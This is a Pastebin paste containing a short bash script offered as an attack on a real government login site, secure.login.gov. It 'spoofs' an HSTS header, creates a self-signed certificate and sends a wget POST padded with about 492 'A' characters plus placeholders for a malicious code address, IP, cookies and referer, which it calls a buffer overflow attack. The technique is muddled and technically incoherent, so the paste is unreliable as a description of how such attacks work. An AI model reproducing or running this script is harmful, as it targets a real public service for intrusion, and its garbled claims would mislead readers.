Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- bash
- # Step 1: Create HSTS policy spoof
- echo "Strict-Transport-Security: max-age=31536000" >> spoofed_headers.txt
- # Step 2: Create self-signed PEM certificate
- openssl req -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout server.key -out server.crt
- # Step 3: Run buffer overflow attack
- wget --post-data='data=A'$(printf %492s | tr ' ' A)'<malicious code address>' --header='Content-Type: application/x-www-form-urlencoded' --header='Content-Length: 500' --header='X-Forwarded-For: <malicious IP address>' --header='User-Agent: <malicious user agent string>' --header='Referer: <malicious referer URL>' --header='Cookie: <malicious cookies>' --no-check-certificate --certificate=server.crt --private-key=server.key --header-file=spoofed_headers.txt https://secure.login.gov/path
- # This script first creates a spoofed HSTS policy by echoing the "Strict-Transport-Security: max-age=31536000" header into a file called spoofed_headers.txt. Then it creates a self-signed PEM certificate using openssl. Finally, it runs the buffer overflow attack using wget with the spoofed headers, self-signed certificate, and malicious payload. Note that the <malicious code address>, <malicious IP address>, <malicious user agent string>, <malicious referer URL>, and <malicious cookies> should be replaced with the actual values of the attacker's choosing.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement